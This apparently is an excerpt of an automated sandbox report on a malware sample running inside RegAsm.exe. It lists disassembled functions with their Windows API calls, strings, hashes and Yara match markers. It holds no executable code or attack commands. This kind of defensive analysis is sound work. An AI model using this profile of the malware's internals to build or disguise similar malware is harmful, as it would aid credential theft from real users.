                                                                                    • Instruction Fuzzy Hash: 09124B71904149EACB15EBE4C956BEEBB78AF18308F5041BAE405735C2DF386B8CCB65
                                                                                    Function 6CC97030 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 54windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32 ref: 6CC97046
                                                                                    • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000), ref: 6CC97060
                                                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CC9707E
                                                                                      • Part of subcall function 6CC481B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6CC481DE
                                                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CC97096
                                                                                    • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6CC9709C
                                                                                    • LocalFree.KERNEL32(?), ref: 6CC970AA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: __acrt_iob_func$ErrorFormatFreeLastLocalMessage__stdio_common_vfprintffflush
                                                                                    • String ID: ### ERROR: %s: %s$(null)
                                                                                    • API String ID: 2989430195-1695379354
                                                                                    • Opcode ID: 18d57eb4f3de29e0856464fe28bb92943cb975df8556b58ad2d8d51f5921caf6
                                                                                    • Instruction ID: 8124e094ee603de008e810359ef376fae09ef820a0fb28981a9df2d671c5d74c
                                                                                    • Opcode Fuzzy Hash: 18d57eb4f3de29e0856464fe28bb92943cb975df8556b58ad2d8d51f5921caf6
                                                                                    • Instruction Fuzzy Hash: 5D01B9B1A00108AFDF00ABE4DC9ADAF7BBCEF49254F010435FA05E3241E6716914CBA5
                                                                                    Function 6CC82C10 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 228stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6CC82C31
                                                                                    • ?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6CC82C61
                                                                                      • Part of subcall function 6CC34DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6CC34E5A
                                                                                      • Part of subcall function 6CC34DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6CC34E97
                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CC82C82
                                                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CC82E2D
                                                                                      • Part of subcall function 6CC481B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6CC481DE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
                                                                                    • String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
                                                                                    • API String ID: 801438305-4149320968
                                                                                    • Opcode ID: d385ce8aeefbdc44acded72305fb4ba73eb3d42deb6f7f9680d228b9c214f0c0
                                                                                    • Instruction ID: 77f7c8d2a811920f5dbfdac0801bb89fbc501b3e29dd3f1148780d1efb9f4057
                                                                                    • Opcode Fuzzy Hash: d385ce8aeefbdc44acded72305fb4ba73eb3d42deb6f7f9680d228b9c214f0c0
                                                                                    • Instruction Fuzzy Hash: ED91E0B06097408FD724CF24C4A869FBBE1AFC9358F14491EE99A87751FB30D949CB52
                                                                                    Function 6CC99E30 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 347COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: __aulldiv__aullrem
                                                                                    • String ID: -Infinity$NaN
                                                                                    • API String ID: 3839614884-2141177498
                                                                                    • Opcode ID: 88987848f3a063f64a5a10850f761dd4747f3cc86f78c739310f5c0f1aba7dd5
                                                                                    • Instruction ID: ab6bdadffe1cd4a29a4aa2c99262c168c13e6353f6d973d07d4c9d313f69a4b5
                                                                                    • Opcode Fuzzy Hash: 88987848f3a063f64a5a10850f761dd4747f3cc86f78c739310f5c0f1aba7dd5
                                                                                    • Instruction Fuzzy Hash: 3AC1A131E04319CFDB14CFA9C89079EB7B6FF88714F144529D406ABB80EB71A949CB91
                                                                                    Function 0041A8A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • IsDebuggerPresent.KERNEL32 ref: 0041D65A
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041D66F
                                                                                    • UnhandledExceptionFilter.KERNEL32(8d), ref: 0041D67A
                                                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 0041D696
                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 0041D69D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                    • String ID: 8d
                                                                                    • API String ID: 2579439406-1695097073
                                                                                    • Opcode ID: 3df5f2af5f9886aae9301c61ac24f13160ce3ef7ffecb5ae9da20c7eae87b595
                                                                                    • Instruction ID: 8650a471880aef750f15a0036821a59eef43acc5f6d326e9b3af3f3796108471
                                                                                    • Opcode Fuzzy Hash: 3df5f2af5f9886aae9301c61ac24f13160ce3ef7ffecb5ae9da20c7eae87b595
                                                                                    • Instruction Fuzzy Hash: F52105BC911324EFE751DF55ED856543BA2FB0A308F50202AEB0887661D7B65581CF0E
                                                                                    Function 0040245C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52encryptionCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • memset.MSVCRT ref: 00402481
                                                                                    • CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,00000000,?,00000000,00000000), ref: 004024A7
                                                                                    • CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,?,?,00000000,00000000), ref: 004024C1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: BinaryCryptString$memset
                                                                                    • String ID: UNK
                                                                                    • API String ID: 1505698593-448974810
                                                                                    • Opcode ID: 2b0e62d7c336e9d0ea714f5c51de4316a1c5bb92040c656a214ac858f78577a5
                                                                                    • Instruction ID: 23a34516ece63cf115ba3724b7c7f869d3e4035490e84059cdf60d193a4bb67a
                                                                                    • Opcode Fuzzy Hash: 2b0e62d7c336e9d0ea714f5c51de4316a1c5bb92040c656a214ac858f78577a5
                                                                                    • Instruction Fuzzy Hash: 4F0162F260011C7EE711EB95DE81DFB77ACEB45698F0000ABB704A3181E6F4AE845A78
                                                                                    Function 6CCA545C Relevance: 6.6, APIs: 5, Instructions: 305COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • memset.VCRUNTIME140(?,000000FF,?), ref: 6CCA8A4B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: memset
                                                                                    • String ID:
                                                                                    • API String ID: 2221118986-0
                                                                                    • Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                                                    • Instruction ID: 16dbecf4110f77ee0d11a7f09f5a8c2795f6cacc94bf472449b708c0bdb53d65
                                                                                    • Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                                                    • Instruction Fuzzy Hash: 93B1E772E0121B8FDB14CFA8CC95B99B7B2FF85314F1442A9C549DB791E7309986CB90
                                                                                    Function 6CCA542B Relevance: 6.5, APIs: 5, Instructions: 287COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • memset.VCRUNTIME140(?,000000FF,?), ref: 6CCA88F0
                                                                                    • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6CCA925C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: memset
                                                                                    • String ID:
                                                                                    • API String ID: 2221118986-0
                                                                                    • Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                                    • Instruction ID: 403cc8438c9d6344da7280d9925acda44dd7f54a54e1b9944efca034669d9211
                                                                                    • Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                                    • Instruction Fuzzy Hash: 42B1D672E0110B8FDB14CF98CC95AADB7B2EF84314F144269C549DBB95E731A98ACB90
                                                                                    Function 6CCA50C7 Relevance: 6.5, APIs: 5, Instructions: 280COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CCA8E18
                                                                                    • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6CCA925C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: memset
                                                                                    • String ID:
                                                                                    • API String ID: 2221118986-0
                                                                                    • Opcode ID: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
                                                                                    • Instruction ID: 67aecc2a34470d7db9565864bf623d754237ad6538d1d6d206fed0fafd9e6941
                                                                                    • Opcode Fuzzy Hash: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
                                                                                    • Instruction Fuzzy Hash: C8A1E972E001178FCB14CF98CC95B99B7B2EF85314F1442B9C949DB785E731A99ACB90
                                                                                    Function 6CC877A0 Relevance: 6.3, APIs: 4, Instructions: 291timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC87A81
                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CC87A93
                                                                                      • Part of subcall function 6CC55C50: GetTickCount64.KERNEL32 ref: 6CC55D40
                                                                                      • Part of subcall function 6CC55C50: EnterCriticalSection.KERNEL32(6CCBF688), ref: 6CC55D67
                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6CC87AA1
                                                                                      • Part of subcall function 6CC55C50: __aulldiv.LIBCMT ref: 6CC55DB4
                                                                                      • Part of subcall function 6CC55C50: LeaveCriticalSection.KERNEL32(6CCBF688), ref: 6CC55DED
                                                                                    • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(FFFFFFFE,?,?,?), ref: 6CC87B31
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Time$CriticalSectionStampV01@@Value@mozilla@@$BaseCount64DurationEnterLeaveNow@PlatformSeconds@Stamp@mozilla@@TickUtils@mozilla@@V12@___aulldiv
                                                                                    • String ID:
                                                                                    • API String ID: 4054851604-0
                                                                                    • Opcode ID: fec2ce6aca0a4b55e8746976372f91eedc43dfa23ec190df97acf15f78fd2d66
                                                                                    • Instruction ID: bd75fdb6a6f6ac53edce3555c5069d78ace88698e5a885d2caaad1225ef9fa66
                                                                                    • Opcode Fuzzy Hash: fec2ce6aca0a4b55e8746976372f91eedc43dfa23ec190df97acf15f78fd2d66
                                                                                    • Instruction Fuzzy Hash: C8B18D357093848BCB14CF64C05069FBBE2ABC531CF154A1CE99567B91FB70E90ADB82
                                                                                    Function 00410DAC Relevance: 6.1, APIs: 4, Instructions: 53memoryencryptionCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 00410DD0
                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,00404415,?,?,?,?,?,?), ref: 00410DDD
                                                                                    • HeapAlloc.KERNEL32(00000000,?,00404415,?,?,?,?,?,?), ref: 00410DE4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocBinaryCryptProcessString
                                                                                    • String ID:
                                                                                    • API String ID: 1871034439-0
                                                                                    • Opcode ID: ad0991718ef18b2bf8ef03264dcc82093b956574455e5d0286dcdbe0f337aa8f
                                                                                    • Instruction ID: 533e96b164cb0d967d7948213eb188af149c3bb85dd902e70f95414ccdf186b2
                                                                                    • Opcode Fuzzy Hash: ad0991718ef18b2bf8ef03264dcc82093b956574455e5d0286dcdbe0f337aa8f
                                                                                    • Instruction Fuzzy Hash: C2016931500209FFDF118FA5EC449EBBBAEFF4A350B104429F90193210D7759C91EB60
                                                                                    Function 00406242 Relevance: 6.0, APIs: 4, Instructions: 48encryptionmemoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004058F9,00000000,00000000), ref: 00406262
                                                                                    • LocalAlloc.KERNEL32(00000040,004058F9,?,?,004058F9,00000000,?,?), ref: 00406270
                                                                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004058F9,00000000,00000000), ref: 00406286
                                                                                    • LocalFree.KERNEL32(00000000,?,?,004058F9,00000000,?,?), ref: 00406295
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: BinaryCryptLocalString$AllocFree
                                                                                    • String ID:
                                                                                    • API String ID: 4291131564-0
                                                                                    • Opcode ID: 5e238f24b81681bd1e218dc304b4b0d5aee478eb474be9148ccb694fddff89b6
                                                                                    • Instruction ID: 7cbb48460589e96c39e43793b365f6781130aaaa1b7fd363564d70c00da41937
                                                                                    • Opcode Fuzzy Hash: 5e238f24b81681bd1e218dc304b4b0d5aee478eb474be9148ccb694fddff89b6
                                                                                    • Instruction Fuzzy Hash: BD01E874101234BFDB215F56DC88E8B7FB9EF4ABA0B104455FA09A6250D3719910DBB0
                                                                                    Function 6CC9B700 Relevance: 4.5, APIs: 3, Instructions: 41nativeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • NtQueryVirtualMemory.NTDLL ref: 6CC9B720
                                                                                    • RtlNtStatusToDosError.NTDLL ref: 6CC9B75A
                                                                                    • RtlSetLastWin32Error.NTDLL(00000000,00000000,000000FF,00000000,00000000,?,0000001C,6CC6FE3F,00000000,00000000,?,?,00000000,?,6CC6FE3F), ref: 6CC9B760
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Error$LastMemoryQueryStatusVirtualWin32
                                                                                    • String ID:
                                                                                    • API String ID: 304294125-0
                                                                                    • Opcode ID: 69602cdc0b1d0e29140f1454348b50086523ef860cf579d2745ad6e8c1d4e294
                                                                                    • Instruction ID: 5d15ee3e7e3c4228bc50bc9e71f681a6e3b29077ee66b0fdb3e494a2e711cfb8
                                                                                    • Opcode Fuzzy Hash: 69602cdc0b1d0e29140f1454348b50086523ef860cf579d2745ad6e8c1d4e294
                                                                                    • Instruction Fuzzy Hash: 7EF0AFB0A0420DBEEF119AE18C98BEEB7BF9B04319F10522AE611A15C0E77495C8C660
                                                                                    Function 6CC9B8C0 Relevance: 3.1, APIs: 2, Instructions: 118nativeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6CC403D4,?), ref: 6CC9B955
                                                                                    • NtQueryVirtualMemory.NTDLL ref: 6CC9B9A5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: MemoryQueryVirtualrand_s
                                                                                    • String ID:
                                                                                    • API String ID: 1889792194-0
                                                                                    • Opcode ID: 24872ef7b6528955813f740f226f3da6c413d6723b10964234b39344335818ec
                                                                                    • Instruction ID: 66f43680a39ea0dab7724b07b212b6010b9756df0d235ffc1eea50774b211e27
                                                                                    • Opcode Fuzzy Hash: 24872ef7b6528955813f740f226f3da6c413d6723b10964234b39344335818ec
                                                                                    • Instruction Fuzzy Hash: BF41B671F0121DAFDF14CFA9D890ADEB7B5EF88354F14812AE505A7704EB319C458B90
                                                                                    Function 0040E2FF Relevance: 93.4, APIs: 62, Instructions: 416memorystringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040E304
                                                                                      • Part of subcall function 0040E204: _EH_prolog.MSVCRT ref: 0040E209
                                                                                      • Part of subcall function 0040E204: lstrlenA.KERNEL32(?,6D187FA0,75B65460,00000000), ref: 0040E22D
                                                                                      • Part of subcall function 0040E204: strchr.MSVCRT ref: 0040E23F
                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,6D187FA0,00000000), ref: 0040E353
                                                                                    • HeapAlloc.KERNEL32(00000000,?,6D187FA0,00000000), ref: 0040E35A
                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,6D187FA0,00000000), ref: 0040E36F
